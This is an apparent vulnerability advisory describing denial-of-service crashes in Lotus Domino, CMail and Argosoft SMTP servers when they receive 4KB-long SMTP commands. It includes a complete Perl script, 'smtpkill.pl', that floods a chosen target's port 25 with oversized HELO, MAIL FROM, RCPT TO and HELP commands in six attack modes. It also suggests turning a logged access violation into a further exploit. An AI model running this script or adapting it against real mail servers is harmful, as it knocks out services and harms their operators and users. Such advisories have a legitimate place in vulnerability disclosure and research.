Many windows based SMTP servers have problems handling with "mail from: 4k_junk" or just "4k_of_junk". Servers that tested vulnerable include Lotus Domino ESMTP Services running Version 5.0.3, the CMail Server version 2.4.6, and the Argosoft Mail Server version 1.2.1.0. Perl demonstration code included.
6981ec5d382606b4beca0cbf358e062bc54741f52bea2b1d33bd0b5f58454f56
Some SMTP Servers have problems handling with "mail from: 4k_junk" or just "4k_of_junk".
Well I tryed this in :
* Lotus Domino ESMTP Services running Version 5.0.3 (Intl) and smtp died
also after mail from: someone@4k_junk
* Lotus Domino ESMTP version 5.0.2 (Intl) is also vulnerable to this.
* I also tryed this against Version 5.0.2c (Intl) without success in DOS so
I assume that 5.0.2c(Intl) is not vulnerable.
* Merak Server Version 2.10.270 is not also vulnerable.
* CMail Server version 2.4.6 is not vulnerable to mail from: someone@4k_junk
BUT is vulnerable to something_4k_junk ! In fact this software even logs
"mail from: someone@4k_junk" as a DOS attempt but crashes when you just send
something_4k_junk !
* Argosoft Mail Server version 1.2.1.0 doesn´t crash with "mail from:
someon@4k:_junk" but after some messages it will log : Error: Access
violation at address 00459CBB in module 'MAILSERVER.EXE'. Read of address
FFFFFFFF but it will continue to serve :) Maybe we could make something
funny with this overflow (?) ;)))
* Many others where I haven´t tryed this...?
I am attaching a demonstration code (perl) for those who want to check any other
servers that might be vulnerable to this.
smiler@vxd.org
#!/usr/bin/perl
# Need net::telnet to run
# Expl0it By smiler@vxd.org
# Tested with sucess against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
# and probably many others that I hadn´t chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)
use Net::Telnet;
print "SmtpKILL By smiler\@vxd.org\n";
if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl <type> <host>
<type> Type of attack :
type 1 = long mail from: someone\@4k_of_junk
type 2 = long rcpt to: someone\@4k_of_junk
type 3 = long helo longdomain_with_4k_of_junk
type 4 = long undefined command (4k_of_junk)
type 5 = long help 4k_of_junk
type 6 = long mail from: and mail to:
<host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}
$type=$ARGV[0];
$target=$ARGV[1];
print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";
for ($i=4096;$i<5096;$i++)
{
$obj=Net::Telnet->new( Host => "$target",Port => 25);
if ($type=~ "1") {
$helo="helo ptrulez";
$from="mail from: v0v0@". 'ptrulez' x $i;
$rcpt="rcpt to: v0v0\@v0v0.pt";
}
if ($type=~ "2") {
$helo="helo ptrulez";
$from="mail from: v0v0\@v0v0.pt";
$rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
}
if ($type=~ "3") {
$helo="helo ". 'ptrulez' x $i;
$from="mail from: v0v0\@v0v0.pt";
$rcpt="rcpt to: v0v0\@v0v0.pt";
}
if ($type=~ "4") {
$helo="havesomefun". 'ptrulez' x $i;
}
if ($type=~ "5") {
$helo="help ". 'ptrulez' x $i;
}
if ($type=~ "6") {
$helo="helo ptrulez";
$from="mail from: ". 'ptrulez' x $i;
$rcpt="rcpt to: ". 'ptrulez' x $i;
}
print "$helo\n";$obj->print("$helo");
print "$from\n";$obj->print("$from");
print "$rcpt\n";$obj->print("$rcpt");
$obj->close;
}